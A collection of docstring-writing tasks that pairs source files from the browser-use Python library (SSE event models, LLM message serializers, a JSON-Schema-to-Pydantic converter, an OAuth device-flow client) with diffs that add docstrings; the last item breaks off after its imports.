+ @observe_debug(ignore_input=True, ignore_output=True,name="debug_function", metadata={"debug": True})
+ def debug_function(param1, param2):
+ return param1 + param2
+ """
kwargs = {
'name': name,
'ignore_input': ignore_input,
@@ -124,17 +185,20 @@
# Convenience functions for checking availability and debug status
def is_lmnr_available() -> bool:
+ """Check if lmnr is available for tracing."""
return _LMNR_AVAILABLE
def is_debug_mode() -> bool:
+ """Check if we're currently in debug mode."""
return _is_debug_mode()
def get_observability_status() -> dict[str, bool]:
+ """Get the current status of observability features."""
return {
'lmnr_available': _LMNR_AVAILABLE,
'debug_mode': _is_debug_mode(),
'observe_active': _LMNR_AVAILABLE,
'observe_debug_active': _LMNR_AVAILABLE and _is_debug_mode(),
- }+ }
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/observability.py |
Add docstrings for utility scripts |
import json
from enum import Enum
from typing import Any
from pydantic import BaseModel
class SandboxError(Exception):
pass
class SSEEventType(str, Enum):
BROWSER_CREATED = 'browser_created'
INSTANCE_CREATED = 'instance_created'
INSTANCE_READY = 'instance_ready'
LOG = 'log'
RESULT = 'result'
ERROR = 'error'
STREAM_COMPLETE = 'stream_complete'
class BrowserCreatedData(BaseModel):
session_id: str
live_url: str
status: str
class LogData(BaseModel):
message: str
level: str = 'info' # stdout, stderr, info, warning, error
class ExecutionResponse(BaseModel):
success: bool
result: Any = None
error: str | None = None
traceback: str | None = None
class ResultData(BaseModel):
execution_response: ExecutionResponse
class ErrorData(BaseModel):
error: str
traceback: str | None = None
status_code: int = 500
class SSEEvent(BaseModel):
type: SSEEventType
data: BrowserCreatedData | LogData | ResultData | ErrorData | dict[str, Any]
timestamp: str | None = None
@classmethod
def from_json(cls, event_json: str) -> 'SSEEvent':
raw_data = json.loads(event_json)
event_type = SSEEventType(raw_data.get('type'))
data_dict = raw_data.get('data', {})
# Parse data based on event type
if event_type == SSEEventType.BROWSER_CREATED:
data = BrowserCreatedData(**data_dict)
elif event_type == SSEEventType.LOG:
data = LogData(**data_dict)
elif event_type == SSEEventType.RESULT:
data = ResultData(**data_dict)
elif event_type == SSEEventType.ERROR:
data = ErrorData(**data_dict)
else:
data = data_dict
return cls(type=event_type, data=data, timestamp=raw_data.get('timestamp'))
def is_browser_created(self) -> bool:
return self.type == SSEEventType.BROWSER_CREATED and isinstance(self.data, BrowserCreatedData)
def is_log(self) -> bool:
return self.type == SSEEventType.LOG and isinstance(self.data, LogData)
def is_result(self) -> bool:
return self.type == SSEEventType.RESULT and isinstance(self.data, ResultData)
def is_error(self) -> bool:
return self.type == SSEEventType.ERROR and isinstance(self.data, ErrorData) | --- +++ @@ -1,3 +1,4 @@+"""Type-safe event models for sandbox execution SSE streaming"""
import json
from enum import Enum
@@ -11,6 +12,7 @@
class SSEEventType(str, Enum):
+ """Event types for Server-Sent Events"""
BROWSER_CREATED = 'browser_created'
INSTANCE_CREATED = 'instance_created'
@@ -22,6 +24,7 @@
class BrowserCreatedData(BaseModel):
+ """Data for browser_created event"""
session_id: str
live_url: str
@@ -29,12 +32,14 @@
class LogData(BaseModel):
+ """Data for log event"""
message: str
level: str = 'info' # stdout, stderr, info, warning, error
class ExecutionResponse(BaseModel):
+ """Execution result from the executor"""
success: bool
result: Any = None
@@ -43,11 +48,13 @@
class ResultData(BaseModel):
+ """Data for result event"""
execution_response: ExecutionResponse
class ErrorData(BaseModel):
+ """Data for error event"""
error: str
traceback: str | None = None
@@ -55,6 +62,22 @@
class SSEEvent(BaseModel):
+ """Type-safe SSE Event
+
+ Usage:
+ # Parse from JSON
+ event = SSEEvent.from_json(event_json_string)
+
+ # Type-safe access with type guards
+ if event.is_browser_created():
+ assert isinstance(event.data, BrowserCreatedData)
+ print(event.data.live_url)
+
+ # Or check event type directly
+ if event.type == SSEEventType.LOG:
+ assert isinstance(event.data, LogData)
+ print(event.data.message)
+ """
type: SSEEventType
data: BrowserCreatedData | LogData | ResultData | ErrorData | dict[str, Any]
@@ -62,6 +85,18 @@
@classmethod
def from_json(cls, event_json: str) -> 'SSEEvent':
+ """Parse SSE event from JSON string with proper type discrimination
+
+ Args:
+ event_json: JSON string from SSE stream
+
+ Returns:
+ Typed SSEEvent with appropriate data model
+
+ Raises:
+ json.JSONDecodeError: If JSON is malformed
+ ValueError: If event type is invalid
+ """
raw_data = json.loads(event_json)
event_type = SSEEventType(raw_data.get('type'))
data_dict = raw_data.get('data', {})
@@ -81,13 +116,17 @@ return cls(type=event_type, data=data, timestamp=raw_data.get('timestamp'))
def is_browser_created(self) -> bool:
+ """Type guard for BrowserCreatedData"""
return self.type == SSEEventType.BROWSER_CREATED and isinstance(self.data, BrowserCreatedData)
def is_log(self) -> bool:
+ """Type guard for LogData"""
return self.type == SSEEventType.LOG and isinstance(self.data, LogData)
def is_result(self) -> bool:
+ """Type guard for ResultData"""
return self.type == SSEEventType.RESULT and isinstance(self.data, ResultData)
def is_error(self) -> bool:
- return self.type == SSEEventType.ERROR and isinstance(self.data, ErrorData)+ """Type guard for ErrorData"""
+ return self.type == SSEEventType.ERROR and isinstance(self.data, ErrorData)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/sandbox/views.py |
Create Google-style docstrings for my code |
from oci.generative_ai_inference.models import ImageContent, ImageUrl, Message, TextContent
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
ContentPartImageParam,
SystemMessage,
UserMessage,
)
class OCIRawMessageSerializer:
@staticmethod
def _is_base64_image(url: str) -> bool:
return url.startswith('data:image/')
@staticmethod
def _parse_base64_url(url: str) -> str:
if not OCIRawMessageSerializer._is_base64_image(url):
raise ValueError(f'Not a base64 image URL: {url}')
# Extract the base64 data from data:image/png;base64,<data>
try:
header, data = url.split(',', 1)
return data
except ValueError:
raise ValueError(f'Invalid base64 image URL format: {url}')
@staticmethod
def _create_image_content(part: ContentPartImageParam) -> ImageContent:
url = part.image_url.url
if OCIRawMessageSerializer._is_base64_image(url):
# Handle base64 encoded images - OCI expects data URLs as-is
image_url = ImageUrl(url=url)
else:
# Handle regular URLs
image_url = ImageUrl(url=url)
return ImageContent(image_url=image_url)
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
oci_messages = []
for message in messages:
oci_message = Message()
if isinstance(message, UserMessage):
oci_message.role = 'USER'
content = message.content
if isinstance(content, str):
text_content = TextContent()
text_content.text = content
oci_message.content = [text_content]
elif isinstance(content, list):
# Handle content parts - text and images
contents = []
for part in content:
if part.type == 'text':
text_content = TextContent()
text_content.text = part.text
contents.append(text_content)
elif part.type == 'image_url':
image_content = OCIRawMessageSerializer._create_image_content(part)
contents.append(image_content)
if contents:
oci_message.content = contents
elif isinstance(message, SystemMessage):
oci_message.role = 'SYSTEM'
content = message.content
if isinstance(content, str):
text_content = TextContent()
text_content.text = content
oci_message.content = [text_content]
elif isinstance(content, list):
# Handle content parts - typically just text for system messages
contents = []
for part in content:
if part.type == 'text':
text_content = TextContent()
text_content.text = part.text
contents.append(text_content)
elif part.type == 'image_url':
# System messages can theoretically have images too
image_content = OCIRawMessageSerializer._create_image_content(part)
contents.append(image_content)
if contents:
oci_message.content = contents
elif isinstance(message, AssistantMessage):
oci_message.role = 'ASSISTANT'
content = message.content
if isinstance(content, str):
text_content = TextContent()
text_content.text = content
oci_message.content = [text_content]
elif isinstance(content, list):
# Handle content parts - text, images, and refusals
contents = []
for part in content:
if part.type == 'text':
text_content = TextContent()
text_content.text = part.text
contents.append(text_content)
elif part.type == 'image_url':
# Assistant messages can have images in responses
# Note: This is currently unreachable in browser-use but kept for completeness
image_content = OCIRawMessageSerializer._create_image_content(part)
contents.append(image_content)
elif part.type == 'refusal':
text_content = TextContent()
text_content.text = f'[Refusal] {part.refusal}'
contents.append(text_content)
if contents:
oci_message.content = contents
else:
# Fallback for any message format issues
oci_message.role = 'USER'
text_content = TextContent()
text_content.text = str(message)
oci_message.content = [text_content]
# Only append messages that have content
if hasattr(oci_message, 'content') and oci_message.content:
oci_messages.append(oci_message)
return oci_messages
@staticmethod
def serialize_messages_for_cohere(messages: list[BaseMessage]) -> str:
conversation_parts = []
for message in messages:
content = ''
if isinstance(message, UserMessage):
if isinstance(message.content, str):
content = message.content
elif isinstance(message.content, list):
# Extract text from content parts
text_parts = []
for part in message.content:
if part.type == 'text':
text_parts.append(part.text)
elif part.type == 'image_url':
# Cohere may not support images in all models, use a short placeholder
# to avoid massive token usage from base64 data URIs
if part.image_url.url.startswith('data:image/'):
text_parts.append('[Image: base64_data]')
else:
text_parts.append('[Image: external_url]')
content = ' '.join(text_parts)
conversation_parts.append(f'User: {content}')
elif isinstance(message, SystemMessage):
if isinstance(message.content, str):
content = message.content
elif isinstance(message.content, list):
# Extract text from content parts
text_parts = []
for part in message.content:
if part.type == 'text':
text_parts.append(part.text)
content = ' '.join(text_parts)
conversation_parts.append(f'System: {content}')
elif isinstance(message, AssistantMessage):
if isinstance(message.content, str):
content = message.content
elif isinstance(message.content, list):
# Extract text from content parts
text_parts = []
for part in message.content:
if part.type == 'text':
text_parts.append(part.text)
elif part.type == 'refusal':
text_parts.append(f'[Refusal] {part.refusal}')
content = ' '.join(text_parts)
conversation_parts.append(f'Assistant: {content}')
else:
# Fallback
conversation_parts.append(f'User: {str(message)}')
return '\n\n'.join(conversation_parts) | --- +++ @@ -1,3 +1,9 @@+"""
+Message serializer for OCI Raw API integration.
+
+This module handles the conversion between browser-use message formats
+and the OCI Raw API message format using proper OCI SDK models.
+"""
from oci.generative_ai_inference.models import ImageContent, ImageUrl, Message, TextContent
@@ -11,13 +17,23 @@
class OCIRawMessageSerializer:
+ """
+ Serializer for converting between browser-use message types and OCI Raw API message formats.
+ Uses proper OCI SDK model objects as shown in the working example.
+
+ Supports both:
+ - GenericChatRequest (Meta, xAI models) - uses messages array
+ - CohereChatRequest (Cohere models) - uses single message string
+ """
@staticmethod
def _is_base64_image(url: str) -> bool:
+ """Check if the URL is a base64 encoded image."""
return url.startswith('data:image/')
@staticmethod
def _parse_base64_url(url: str) -> str:
+ """Parse base64 URL and return the base64 data."""
if not OCIRawMessageSerializer._is_base64_image(url):
raise ValueError(f'Not a base64 image URL: {url}')
@@ -30,6 +46,7 @@
@staticmethod
def _create_image_content(part: ContentPartImageParam) -> ImageContent:
+ """Convert ContentPartImageParam to OCI ImageContent."""
url = part.image_url.url
if OCIRawMessageSerializer._is_base64_image(url):
@@ -43,6 +60,15 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
+ """
+ Serialize a list of browser-use messages to OCI Raw API Message objects.
+
+ Args:
+ messages: List of browser-use messages
+
+ Returns:
+ List of OCI Message objects
+ """
oci_messages = []
for message in messages:
@@ -132,6 +158,18 @@
@staticmethod
def serialize_messages_for_cohere(messages: list[BaseMessage]) -> str:
+ """
+ Serialize messages for Cohere models which expect a single message string.
+
+ Cohere models use CohereChatRequest.message (string) instead of messages array.
+ We combine all messages into a single conversation string.
+
+ Args:
+ messages: List of browser-use messages
+
+ Returns:
+ Single string containing the conversation
+ """
conversation_parts = []
for message in messages:
@@ -188,4 +226,4 @@ # Fallback
conversation_parts.append(f'User: {str(message)}')
- return '\n\n'.join(conversation_parts)+ return '\n\n'.join(conversation_parts)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/oci_raw/serializer.py |
Add docstrings for production code |
from browser_use.dom.service import EnhancedDOMTreeNode
def get_click_description(node: EnhancedDOMTreeNode) -> str:
parts = []
# Tag name
parts.append(node.tag_name)
# Add type for inputs
if node.tag_name == 'input' and node.attributes.get('type'):
input_type = node.attributes['type']
parts.append(f'type={input_type}')
# For checkboxes, include checked state
if input_type == 'checkbox':
is_checked = node.attributes.get('checked', 'false').lower() in ['true', 'checked', '']
# Also check AX node
if node.ax_node and node.ax_node.properties:
for prop in node.ax_node.properties:
if prop.name == 'checked':
is_checked = prop.value is True or prop.value == 'true'
break
state = 'checked' if is_checked else 'unchecked'
parts.append(f'checkbox-state={state}')
# Add role if present
if node.attributes.get('role'):
role = node.attributes['role']
parts.append(f'role={role}')
# For role=checkbox, include state
if role == 'checkbox':
aria_checked = node.attributes.get('aria-checked', 'false').lower()
is_checked = aria_checked in ['true', 'checked']
if node.ax_node and node.ax_node.properties:
for prop in node.ax_node.properties:
if prop.name == 'checked':
is_checked = prop.value is True or prop.value == 'true'
break
state = 'checked' if is_checked else 'unchecked'
parts.append(f'checkbox-state={state}')
# For labels/spans/divs, check if related to a hidden checkbox
if node.tag_name in ['label', 'span', 'div'] and 'type=' not in ' '.join(parts):
# Check children for hidden checkbox
for child in node.children:
if child.tag_name == 'input' and child.attributes.get('type') == 'checkbox':
# Check if hidden
is_hidden = False
if child.snapshot_node and child.snapshot_node.computed_styles:
opacity = child.snapshot_node.computed_styles.get('opacity', '1')
if opacity == '0' or opacity == '0.0':
is_hidden = True
if is_hidden or not child.is_visible:
# Get checkbox state
is_checked = child.attributes.get('checked', 'false').lower() in ['true', 'checked', '']
if child.ax_node and child.ax_node.properties:
for prop in child.ax_node.properties:
if prop.name == 'checked':
is_checked = prop.value is True or prop.value == 'true'
break
state = 'checked' if is_checked else 'unchecked'
parts.append(f'checkbox-state={state}')
break
# Add short text content if available
text = node.get_all_children_text().strip()
if text:
short_text = text[:30] + ('...' if len(text) > 30 else '')
parts.append(f'"{short_text}"')
# Add key attributes like id, name, aria-label
for attr in ['id', 'name', 'aria-label']:
if node.attributes.get(attr):
parts.append(f'{attr}={node.attributes[attr][:20]}')
return ' '.join(parts) | --- +++ @@ -1,8 +1,10 @@+"""Utility functions for browser tools."""
from browser_use.dom.service import EnhancedDOMTreeNode
def get_click_description(node: EnhancedDOMTreeNode) -> str:
+ """Get a brief description of the clicked element for memory."""
parts = []
# Tag name
@@ -77,4 +79,4 @@ if node.attributes.get(attr):
parts.append(f'{attr}={node.attributes[attr][:20]}')
- return ' '.join(parts)+ return ' '.join(parts)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/utils.py |
Document this script properly | from openai.types.chat import ChatCompletionMessageParam
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openai.serializer import OpenAIMessageSerializer
class OpenRouterMessageSerializer:
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
# OpenRouter uses the same message format as OpenAI
return OpenAIMessageSerializer.serialize_messages(messages) | --- +++ @@ -5,8 +5,22 @@
class OpenRouterMessageSerializer:
+ """
+ Serializer for converting between custom message types and OpenRouter message formats.
+
+ OpenRouter uses the OpenAI-compatible API, so we can reuse the OpenAI serializer.
+ """
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
+ """
+ Serialize a list of browser_use messages to OpenRouter-compatible messages.
+
+ Args:
+ messages: List of browser_use messages
+
+ Returns:
+ List of OpenRouter-compatible messages (identical to OpenAI format)
+ """
# OpenRouter uses the same message format as OpenAI
- return OpenAIMessageSerializer.serialize_messages(messages)+ return OpenAIMessageSerializer.serialize_messages(messages)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openrouter/serializer.py |
Add docstrings for production code |
import logging
from typing import Any
from pydantic import BaseModel, ConfigDict, Field, create_model
logger = logging.getLogger(__name__)
# Keywords that indicate composition/reference patterns we don't support
_UNSUPPORTED_KEYWORDS = frozenset(
{
'$ref',
'allOf',
'anyOf',
'oneOf',
'not',
'$defs',
'definitions',
'if',
'then',
'else',
'dependentSchemas',
'dependentRequired',
}
)
# Primitive JSON Schema type → Python type
_PRIMITIVE_MAP: dict[str, type] = {
'string': str,
'number': float,
'integer': int,
'boolean': bool,
'null': type(None),
}
class _StrictBase(BaseModel):
model_config = ConfigDict(extra='forbid', validate_by_name=True, validate_by_alias=True)
def _check_unsupported(schema: dict) -> None:
for kw in _UNSUPPORTED_KEYWORDS:
if kw in schema:
raise ValueError(f'Unsupported JSON Schema keyword: {kw}')
def _resolve_type(schema: dict, name: str) -> Any:
_check_unsupported(schema)
json_type = schema.get('type', 'string')
# Enums — constrain to str (Literal would be stricter but LLMs are flaky)
if 'enum' in schema:
return str
# Object with properties → nested pydantic model
if json_type == 'object':
properties = schema.get('properties', {})
if properties:
return _build_model(schema, name)
return dict
# Array
if json_type == 'array':
items_schema = schema.get('items')
if items_schema:
item_type = _resolve_type(items_schema, f'{name}_item')
return list[item_type]
return list
# Primitive
base = _PRIMITIVE_MAP.get(json_type, str)
# Nullable
if schema.get('nullable', False):
return base | None
return base
_PRIMITIVE_DEFAULTS: dict[str, Any] = {
'string': '',
'number': 0.0,
'integer': 0,
'boolean': False,
}
def _build_model(schema: dict, name: str) -> type[BaseModel]:
_check_unsupported(schema)
properties = schema.get('properties', {})
required_fields = set(schema.get('required', []))
fields: dict[str, Any] = {}
for prop_name, prop_schema in properties.items():
prop_type = _resolve_type(prop_schema, f'{name}_{prop_name}')
if prop_name in required_fields:
default = ...
elif 'default' in prop_schema:
default = prop_schema['default']
elif prop_schema.get('nullable', False):
# _resolve_type already made the type include None
default = None
else:
# Non-required, non-nullable, no explicit default.
# Use a type-appropriate zero value for primitives/arrays;
# fall back to None (with | None) for enums and nested objects
# where no in-set or constructible default exists.
json_type = prop_schema.get('type', 'string')
if 'enum' in prop_schema:
# Can't pick an arbitrary enum member as default — use None
# so absent fields serialize as null, not an out-of-set value.
prop_type = prop_type | None
default = None
elif json_type in _PRIMITIVE_DEFAULTS:
default = _PRIMITIVE_DEFAULTS[json_type]
elif json_type == 'array':
default = []
else:
# Nested object or unknown — must allow None as sentinel
prop_type = prop_type | None
default = None
field_kwargs: dict[str, Any] = {}
if 'description' in prop_schema:
field_kwargs['description'] = prop_schema['description']
if isinstance(default, list) and not default:
fields[prop_name] = (prop_type, Field(default_factory=list, **field_kwargs))
else:
fields[prop_name] = (prop_type, Field(default, **field_kwargs))
return create_model(name, __base__=_StrictBase, **fields)
def schema_dict_to_pydantic_model(schema: dict) -> type[BaseModel]:
_check_unsupported(schema)
top_type = schema.get('type')
if top_type != 'object':
raise ValueError(f'Top-level schema must have type "object", got {top_type!r}')
properties = schema.get('properties')
if not properties:
raise ValueError('Top-level schema must have at least one property')
model_name = schema.get('title', 'DynamicExtractionModel')
return _build_model(schema, model_name) | --- +++ @@ -1,3 +1,4 @@+"""Converts a JSON Schema dict to a runtime Pydantic model for structured extraction."""
import logging
from typing import Any
@@ -39,12 +40,17 @@
def _check_unsupported(schema: dict) -> None:
+ """Raise ValueError if the schema uses unsupported composition keywords."""
for kw in _UNSUPPORTED_KEYWORDS:
if kw in schema:
raise ValueError(f'Unsupported JSON Schema keyword: {kw}')
def _resolve_type(schema: dict, name: str) -> Any:
+ """Recursively resolve a JSON Schema node to a Python type.
+
+ Returns a Python type suitable for use as a field type in pydantic.create_model.
+ """
_check_unsupported(schema)
json_type = schema.get('type', 'string')
@@ -87,6 +93,7 @@
def _build_model(schema: dict, name: str) -> type[BaseModel]:
+ """Build a pydantic model from an object-type JSON Schema node."""
_check_unsupported(schema)
properties = schema.get('properties', {})
@@ -136,6 +143,17 @@
def schema_dict_to_pydantic_model(schema: dict) -> type[BaseModel]:
+ """Convert a JSON Schema dict to a runtime Pydantic model.
+
+ The schema must be ``{"type": "object", "properties": {...}, ...}``.
+ Unsupported keywords ($ref, allOf, anyOf, oneOf, etc.) raise ValueError.
+
+ Returns:
+ A dynamically-created Pydantic BaseModel subclass.
+
+ Raises:
+ ValueError: If the schema is invalid or uses unsupported features.
+ """
_check_unsupported(schema)
top_type = schema.get('type')
@@ -147,4 +165,4 @@ raise ValueError('Top-level schema must have at least one property')
model_name = schema.get('title', 'DynamicExtractionModel')
- return _build_model(schema, model_name)+ return _build_model(schema, model_name)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/extraction/schema_utils.py |
Add missing documentation to my Python functions |
import asyncio
import json
import os
import shutil
import time
from datetime import datetime
import httpx
from pydantic import BaseModel
from uuid_extensions import uuid7str
from browser_use.config import CONFIG
# Temporary user ID for pre-auth events (matches cloud backend)
TEMP_USER_ID = '99999999-9999-9999-9999-999999999999'
def get_or_create_device_id() -> str:
device_id_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id'
# Try to read existing device ID
if device_id_path.exists():
try:
device_id = device_id_path.read_text().strip()
if device_id: # Make sure it's not empty
return device_id
except Exception:
# If we can't read it, we'll create a new one
pass
# Create new device ID
device_id = uuid7str()
# Ensure config directory exists
CONFIG.BROWSER_USE_CONFIG_DIR.mkdir(parents=True, exist_ok=True)
# Write device ID to file
device_id_path.write_text(device_id)
return device_id
class CloudAuthConfig(BaseModel):
api_token: str | None = None
user_id: str | None = None
authorized_at: datetime | None = None
@classmethod
def load_from_file(cls) -> 'CloudAuthConfig':
config_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'cloud_auth.json'
if config_path.exists():
try:
with open(config_path) as f:
data = json.load(f)
return cls.model_validate(data)
except Exception:
# Return empty config if file is corrupted
pass
return cls()
def save_to_file(self) -> None:
CONFIG.BROWSER_USE_CONFIG_DIR.mkdir(parents=True, exist_ok=True)
config_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'cloud_auth.json'
with open(config_path, 'w') as f:
json.dump(self.model_dump(mode='json'), f, indent=2, default=str)
# Set restrictive permissions (owner read/write only) for security
try:
os.chmod(config_path, 0o600)
except Exception:
# Some systems may not support chmod, continue anyway
pass
class DeviceAuthClient:
def __init__(self, base_url: str | None = None, http_client: httpx.AsyncClient | None = None):
# Backend API URL for OAuth requests - can be passed directly or defaults to env var
self.base_url = base_url or CONFIG.BROWSER_USE_CLOUD_API_URL
self.client_id = 'library'
self.scope = 'read write'
# If no client provided, we'll create one per request
self.http_client = http_client
# Temporary user ID for pre-auth events
self.temp_user_id = TEMP_USER_ID
# Get or create persistent device ID
self.device_id = get_or_create_device_id()
# Load existing auth if available
self.auth_config = CloudAuthConfig.load_from_file()
@property
def is_authenticated(self) -> bool:
return bool(self.auth_config.api_token and self.auth_config.user_id)
@property
def api_token(self) -> str | None:
return self.auth_config.api_token
@property
def user_id(self) -> str:
return self.auth_config.user_id or self.temp_user_id
async def start_device_authorization(
self,
agent_session_id: str | None = None,
) -> dict:
if self.http_client:
response = await self.http_client.post(
f'{self.base_url.rstrip("/")}/api/v1/oauth/device/authorize',
data={
'client_id': self.client_id,
'scope': self.scope,
'agent_session_id': agent_session_id or '',
'device_id': self.device_id,
},
)
response.raise_for_status()
return response.json()
else:
async with httpx.AsyncClient() as client:
response = await client.post(
f'{self.base_url.rstrip("/")}/api/v1/oauth/device/authorize',
data={
'client_id': self.client_id,
'scope': self.scope,
'agent_session_id': agent_session_id or '',
'device_id': self.device_id,
},
)
response.raise_for_status()
return response.json()
async def poll_for_token(
self,
device_code: str,
interval: float = 3.0,
timeout: float = 1800.0,
) -> dict | None:
start_time = time.time()
if self.http_client:
# Use injected client for all requests
while time.time() - start_time < timeout:
try:
response = await self.http_client.post(
f'{self.base_url.rstrip("/")}/api/v1/oauth/device/token',
data={
'grant_type': 'urn:ietf:params:oauth:grant-type:device_code',
'device_code': device_code,
'client_id': self.client_id,
},
)
if response.status_code == 200:
data = response.json()
# Check for pending authorization
if data.get('error') == 'authorization_pending':
await asyncio.sleep(interval)
continue
# Check for slow down
if data.get('error') == 'slow_down':
interval = data.get('interval', interval * 2)
await asyncio.sleep(interval)
continue
# Check for other errors
if 'error' in data:
print(f'Error: {data.get("error_description", data["error"])}')
return None
# Success! We have a token
if 'access_token' in data:
return data
elif response.status_code == 400:
# Error response
data = response.json()
if data.get('error') not in ['authorization_pending', 'slow_down']:
print(f'Error: {data.get("error_description", "Unknown error")}')
return None
else:
print(f'Unexpected status code: {response.status_code}')
return None
except Exception as e:
print(f'Error polling for token: {e}')
await asyncio.sleep(interval)
else:
# Create a new client for polling
async with httpx.AsyncClient() as client:
while time.time() - start_time < timeout:
try:
response = await client.post(
f'{self.base_url.rstrip("/")}/api/v1/oauth/device/token',
data={
'grant_type': 'urn:ietf:params:oauth:grant-type:device_code',
'device_code': device_code,
'client_id': self.client_id,
},
)
if response.status_code == 200:
data = response.json()
# Check for pending authorization
if data.get('error') == 'authorization_pending':
await asyncio.sleep(interval)
continue
# Check for slow down
if data.get('error') == 'slow_down':
interval = data.get('interval', interval * 2)
await asyncio.sleep(interval)
continue
# Check for other errors
if 'error' in data:
print(f'Error: {data.get("error_description", data["error"])}')
return None
# Success! We have a token
if 'access_token' in data:
return data
elif response.status_code == 400:
# Error response
data = response.json()
if data.get('error') not in ['authorization_pending', 'slow_down']:
print(f'Error: {data.get("error_description", "Unknown error")}')
return None
else:
print(f'Unexpected status code: {response.status_code}')
return None
except Exception as e:
print(f'Error polling for token: {e}')
await asyncio.sleep(interval)
return None
async def authenticate(
self,
agent_session_id: str | None = None,
show_instructions: bool = True,
) -> bool:
import logging
logger = logging.getLogger(__name__)
try:
# Start device authorization
device_auth = await self.start_device_authorization(agent_session_id)
# Use frontend URL for user-facing links
frontend_url = CONFIG.BROWSER_USE_CLOUD_UI_URL or self.base_url.replace('//api.', '//cloud.')
# Replace backend URL with frontend URL in verification URIs
verification_uri = device_auth['verification_uri'].replace(self.base_url, frontend_url)
verification_uri_complete = device_auth['verification_uri_complete'].replace(self.base_url, frontend_url)
terminal_width, _terminal_height = shutil.get_terminal_size((80, 20))
if show_instructions and CONFIG.BROWSER_USE_CLOUD_SYNC:
logger.info('─' * max(terminal_width - 40, 20))
logger.info('🌐 View the details of this run in Browser Use Cloud:')
logger.info(f' 👉 {verification_uri_complete}')
logger.info('─' * max(terminal_width - 40, 20) + '\n')
# Poll for token
token_data = await self.poll_for_token(
device_code=device_auth['device_code'],
interval=device_auth.get('interval', 5),
)
if token_data and token_data.get('access_token'):
# Save authentication
self.auth_config.api_token = token_data['access_token']
self.auth_config.user_id = token_data.get('user_id', self.temp_user_id)
self.auth_config.authorized_at = datetime.now()
self.auth_config.save_to_file()
if show_instructions:
logger.debug('✅ Authentication successful! Cloud sync is now enabled with your browser-use account.')
return True
except httpx.HTTPStatusError as e:
# HTTP error with response
if e.response.status_code == 404:
logger.warning(
'Cloud sync authentication endpoint not found (404). Check your BROWSER_USE_CLOUD_API_URL setting.'
)
else:
logger.warning(f'Failed to authenticate with cloud service: HTTP {e.response.status_code} - {e.response.text}')
except httpx.RequestError as e:
# Connection/network errors
# logger.warning(f'Failed to connect to cloud service: {type(e).__name__}: {e}')
pass
except Exception as e:
# Other unexpected errors
logger.warning(f'❌ Unexpected error during cloud sync authentication: {type(e).__name__}: {e}')
if show_instructions:
logger.debug(f'❌ Sync authentication failed or timed out with {CONFIG.BROWSER_USE_CLOUD_API_URL}')
return False
def get_headers(self) -> dict:
if self.api_token:
return {'Authorization': f'Bearer {self.api_token}'}
return {}
def clear_auth(self) -> None:
self.auth_config = CloudAuthConfig()
# Remove the config file entirely instead of saving empty values
config_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'cloud_auth.json'
config_path.unlink(missing_ok=True) | --- +++ @@ -1,3 +1,6 @@+"""
+OAuth2 Device Authorization Grant flow client for browser-use.
+"""
import asyncio
import json
@@ -17,6 +20,7 @@
def get_or_create_device_id() -> str:
+ """Get or create a persistent device ID for this installation."""
device_id_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id'
# Try to read existing device ID
@@ -42,6 +46,7 @@
class CloudAuthConfig(BaseModel):
+ """Configuration for cloud authentication"""
api_token: str | None = None
user_id: str | None = None
@@ -49,6 +54,7 @@
@classmethod
def load_from_file(cls) -> 'CloudAuthConfig':
+ """Load auth config from local file"""
config_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'cloud_auth.json'
if config_path.exists():
@@ -62,6 +68,7 @@ return cls()
def save_to_file(self) -> None:
+ """Save auth config to local file"""
CONFIG.BROWSER_USE_CONFIG_DIR.mkdir(parents=True, exist_ok=True)
@@ -78,6 +85,7 @@
class DeviceAuthClient:
+ """Client for OAuth2 device authorization flow"""
def __init__(self, base_url: str | None = None, http_client: httpx.AsyncClient | None = None):
# Backend API URL for OAuth requests - can be passed directly or defaults to env var
@@ -99,20 +107,27 @@
@property
def is_authenticated(self) -> bool:
+ """Check if we have valid authentication"""
return bool(self.auth_config.api_token and self.auth_config.user_id)
@property
def api_token(self) -> str | None:
+ """Get the current API token"""
return self.auth_config.api_token
@property
def user_id(self) -> str:
+ """Get the current user ID (temporary or real)"""
return self.auth_config.user_id or self.temp_user_id
async def start_device_authorization(
self,
agent_session_id: str | None = None,
) -> dict:
+ """
+ Start the device authorization flow.
+ Returns device authorization details including user code and verification URL.
+ """
if self.http_client:
response = await self.http_client.post(
f'{self.base_url.rstrip("/")}/api/v1/oauth/device/authorize',
@@ -145,6 +160,10 @@ interval: float = 3.0,
timeout: float = 1800.0,
) -> dict | None:
+ """
+ Poll for the access token.
+ Returns token info when authorized, None if timeout.
+ """
start_time = time.time()
if self.http_client:
@@ -258,6 +277,10 @@ agent_session_id: str | None = None,
show_instructions: bool = True,
) -> bool:
+ """
+ Run the full authentication flow.
+ Returns True if authentication successful.
+ """
import logging
logger = logging.getLogger(__name__)
@@ -320,13 +343,15 @@ return False
def get_headers(self) -> dict:
+ """Get headers for API requests"""
if self.api_token:
return {'Authorization': f'Bearer {self.api_token}'}
return {}
def clear_auth(self) -> None:
+ """Clear stored authentication"""
self.auth_config = CloudAuthConfig()
# Remove the config file entirely instead of saving empty values
config_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'cloud_auth.json'
- config_path.unlink(missing_ok=True)+ config_path.unlink(missing_ok=True)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/sync/auth.py |
Write proper docstrings for these functions |
from typing import Any
from browser_use_sdk.types.parameter_schema import ParameterSchema
from browser_use_sdk.types.skill_response import SkillResponse
